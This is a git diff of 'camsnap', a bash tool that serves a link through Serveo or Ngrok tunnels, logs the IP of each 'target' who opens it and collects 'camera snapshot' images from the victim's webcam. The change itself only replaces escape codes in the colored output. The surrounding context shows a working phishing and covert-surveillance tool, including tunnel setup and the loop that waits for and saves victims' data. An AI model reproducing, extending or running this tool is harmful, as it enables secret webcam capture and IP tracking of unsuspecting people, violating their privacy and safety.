Add files via upload

diff --git a/camsnap b/camsnap
--- a/camsnap
+++ b/camsnap
@@ -39,12 +39,12 @@ fi
 
 banner() {
 
-printf "\e[1;92m   ____               \e[0m\e[1;77m ____                    \e[0m\n"
-printf "\e[1;92m  / ___|__ _ _ __ ___ \e[0m\e[1;77m/ ___| _ __   __ _ _ __  \e[0m\n"
-printf "\e[1;92m | |   / _\` | '_ \` _ \\\\\e[0m\e[1;77m\___ \| '_ \ / _\` | '_ \ \e[0m\n"
-printf "\e[1;92m | |__| (_| | | | | | |\e[0m\e[1;77m___) | | | | (_| | |_) |\e[0m\n"
-printf "\e[1;92m  \____\__,_|_| |_| |_|\e[0m\e[1;77m____/|_| |_|\__,_| .__/ \e[0m\n"
-printf "\e[1;92m                       \e[0m\e[1;77m                 |_|    \e[0m\n"
+printf "\033[1;92m   ____               \033[0m\033[1;77m ____                    \033[0m\n"
+printf "\033[1;92m  / ___|__ _ _ __ ___ \033[0m\033[1;77m/ ___| _ __   __ _ _ __  \033[0m\n"
+printf "\033[1;92m | |   / _\` | '_ \` _ \\\\\033[0m\033[1;77m\___ \| '_ \ / _\` | '_ \ \033[0m\n"
+printf "\033[1;92m | |__| (_| | | | | | |\033[0m\033[1;77m___) | | | | (_| | |_) |\033[0m\n"
+printf "\033[1;92m  \____\__,_|_| |_| |_|\033[0m\033[1;77m____/|_| |_|\__,_| .__/ \033[0m\n"
+printf "\033[1;92m                       \033[0m\033[1;77m                 |_|    \033[0m\n"
 
 }
 
@@ -71,7 +71,7 @@ exit 1
 dependencies() {
 
 
-command -v php > /dev/null 2>&1 || { echo -e "\n\e[1;31m[\e[0m-\e[1;31m] Error, php is not installed!\e[0m"; exit; }
+command -v php > /dev/null 2>&1 || { echo -e "\n\033[1;31m[\033[0m-\033[1;31m] Error, php is not installed!\033[0m"; exit; }
  
 
 
@@ -81,7 +81,7 @@ catch_ip() {
 
 ip=$(grep -a 'IP:' ip.txt | cut -d " " -f2 | tr -d '\r')
 IFS=$'\n'
-printf "\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] IP:\e[0m\e[1;77m %s\e[0m\n" $ip
+printf "\033[1;93m[\033[0m\033[1;77m+\033[0m\033[1;93m] IP:\033[0m\033[1;77m %s\033[0m\n" $ip
 
 cat ip.txt >> saved.ip.txt
 
@@ -90,12 +90,12 @@ cat ip.txt >> saved.ip.txt
 
 checkfound() {
 
-printf "\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Waiting for targets...\e[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m*\033[0m\033[1;92m] Waiting for targets...\033[0m\n"
 while [ true ]; do
 
 
 if [[ -e "ip.txt" ]]; then
-printf "\e[1;92m[\e[0m+\e[1;92m] Target opened the link!\n"
+printf "\033[1;92m[\033[0m+\033[1;92m] Target opened the link!\n"
 catch_ip
 rm -rf ip.txt
 
@@ -107,9 +107,9 @@ if [[ -e ".log.log" ]]; then
 {
 mv .*.png images/img"$RANDOM".png
 } &> /dev/null
-printf "\e[1;92m[\e[0m+\e[1;92m] Getting camera snapshot...\e[0m\n"
+printf "\033[1;92m[\033[0m+\033[1;92m] Getting camera snapshot...\033[0m\n"
 sleep 0.5
-printf "\e[1;92m[\e[0m+\e[1;92m] Camera snapshot received!\e[0m\n"
+printf "\033[1;92m[\033[0m+\033[1;92m] Camera snapshot received!\033[0m\n"
 rm -rf .log.log
 fi
 sleep 0.5
@@ -121,9 +121,9 @@ done
 
 server() {
 
-command -v ssh > /dev/null 2>&1 || { echo -e "\e[1;31m[\e[0m-\e[1;31m] Error, ssh is not installed!\e[0m"; exit; }
+command -v ssh > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, ssh is not installed!\033[0m"; exit; }
 
-printf "\e[1;77m[\e[0m\e[1;93m+\e[0m\e[1;77m] Starting Serveo...\e[0m\n"
+printf "\033[1;77m[\033[0m\033[1;93m+\033[0m\033[1;77m] Starting Serveo...\033[0m\n"
 
 if [[ $checkphp == *'php'* ]]; then
 killall -2 php > /dev/null 2>&1
@@ -139,12 +139,12 @@ $(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:
 
 sleep 8
 fi
-printf "\e[1;77m[\e[0m\e[1;33m+\e[0m\e[1;77m] Starting php server...\e[0m\n"
+printf "\033[1;77m[\033[0m\033[1;33m+\033[0m\033[1;77m] Starting php server...\033[0m\n"
 fuser -k 3333/tcp > /dev/null 2>&1
 php -S localhost:3333 > /dev/null 2>&1 &
 sleep 3
 send_link=$(grep -o "https://[0-9a-z]*\.serveo.net" sendlink)
-printf '\e[1;93m[\e[0m\e[1;77m+\e[0m\e[1;93m] Direct link:\e[0m\e[1;77m %s \n' $send_link
+printf '\033[1;93m[\033[0m\033[1;77m+\033[0m\033[1;93m] Direct link:\033[0m\033[1;77m %s \n' $send_link
 
 }
 
@@ -164,9 +164,9 @@ ngrok_server() {
 if [[ -e ngrok ]]; then
 echo ""
 else
-command -v unzip > /dev/null 2>&1 || { echo -e "\e[1;31m[\e[0m-\e[1;31m] Error, unzip is not installed!\e[0m"; exit; }
-command -v wget > /dev/null 2>&1 || { echo -e "\e[1;31m[\e[0m-\e[1;31m] Error, wget is not installed!\e[0m"; exit; }
-printf "\e[1;92m[\e[0m+\e[1;92m] Downloading Ngrok...\n"
+command -v unzip > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, unzip is not installed!\033[0m"; exit; }
+command -v wget > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, wget is not installed!\033[0m"; exit; }
+printf "\033[1;92m[\033[0m+\033[1;92m] Downloading Ngrok...\n"
 arch=$(uname -a | grep -o 'arm' | head -n1)
 arch2=$(uname -a | grep -o 'Android' | head -n1)
 if [[ $arch == *'arm'* ]] || [[ $arch2 == *'Android'* ]] ; then
@@ -177,7 +177,7 @@ unzip ngrok-stable-linux-arm.zip > /dev/null 2>&1
 chmod +x ngrok
 rm -rf ngrok-stable-linux-arm.zip
 else
-printf "\e[1;31m[\e[0m-\e[1;31m] Download failed!\e[0m\n"
+printf "\033[1;31m[\033[0m-\033[1;31m] Download failed!\033[0m\n"
 exit
 fi
 
@@ -188,21 +188,21 @@ unzip ngrok-stable-linux-386.zip > /dev/null 2>&1
 chmod +x ngrok
 rm -rf ngrok-stable-linux-386.zip
 else
-printf "\e[1;31m[\e[0m-\e[1;31m] Download failed!\e[0m\n"
+printf "\033[1;31m[\033[0m-\033[1;31m] Download failed!\033[0m\n"
 exit
 fi
 fi
 fi
 
-printf "\e[1;92m[\e[0m+\e[1;92m] Starting php server...\n"
+printf "\033[1;92m[\033[0m+\033[1;92m] Starting php server...\n"
 php -S 127.0.0.1:3333 > /dev/null 2>&1 & 
 sleep 2
-printf "\e[1;92m[\e[0m+\e[1;92m] Starting Ngrok...\n"
+printf "\033[1;92m[\033[0m+\033[1;92m] Starting Ngrok...\n"
 ./ngrok http 3333 > /dev/null 2>&1 &
 sleep 10
 
 link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
-printf "\e[1;92m[\e[0m*\e[1;92m] Direct link:\e[0m\e[1;77m %s\e[0m\n" $link
+printf "\033[1;92m[\033[0m*\033[1;92m] Direct link:\033[0m\033[1;77m %s\033[0m\n" $link
 
 payload_ngrok
 checkfound
@@ -212,14 +212,14 @@ start1() {
 if [[ -e sendlink ]]; then
 rm -rf sendlink
 fi
-printf "\e[1;92m[\e[0m\e[1;77m1\e[0m\e[1;92m]\e[0m\e[1;93m Serveo\e[0m\n"
-printf "\e[1;92m[\e[0m\e[1;77m2\e[0m\e[1;92m]\e[0m\e[1;93m Ngrok\e[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m1\033[0m\033[1;92m]\033[0m\033[1;93m Serveo\033[0m\n"
+printf "\033[1;92m[\033[0m\033[1;77m2\033[0m\033[1;92m]\033[0m\033[1;93m Ngrok\033[0m\n"
 default_option_server="1"
-read -e -p $'\n\e[1;92m[\e[0m\e[1;77m+\e[0m\e[1;92m] Choose portfwd service: \e[0m' option_server
+read -e -p $'\n\033[1;92m[\033[0m\033[1;77m+\033[0m\033[1;92m] Choose portfwd service: \033[0m' option_server
 option_server="${option_server:-${default_option_server}}"
 if [[ $option_server -eq 1 ]]; then
 
-command -v php > /dev/null 2>&1 || { echo -e "\e[1;31m[\e[0m-\e[1;31m] Error, php is not installed!\e[0m"; exit; }
+command -v php > /dev/null 2>&1 || { echo -e "\033[1;31m[\033[0m-\033[1;31m] Error, php is not installed!\033[0m"; exit; }
 start
 
 elif [[ $option_server -eq 2 ]]; then
@@ -249,11 +249,11 @@ start() {
 default_choose_sub="Y"
 default_subdomain="camsnap$RANDOM"
 
-read -e -p $'\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Choose subdomain? (Default:\e[0m\e[1;77m [Y/n]\e[0m\e[1;33m): \e[0m' choose_sub
+read -e -p $'\033[1;33m[\033[0m\033[1;77m+\033[0m\033[1;33m] Choose subdomain? (Default:\033[0m\033[1;77m [Y/n]\033[0m\033[1;33m): \033[0m' choose_sub
 choose_sub="${choose_sub:-${default_choose_sub}}"
 if [[ $choose_sub == "Y" || $choose_sub == "y" || $choose_sub == "Yes" || $choose_sub == "yes" ]]; then
 subdomain_resp=true
-printf '\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Subdomain: (Default:\e[0m\e[1;77m %s\e[0m\e[1;33m): \e[0m' $default_subdomain
+printf '\033[1;33m[\033[0m\033[1;77m+\033[0m\033[1;33m] Subdomain: (Default:\033[0m\033[1;77m %s\033[0m\033[1;33m): \033[0m' $default_subdomain
 read -e subdomain
 if [[ $subdomain = "" ]]
 then
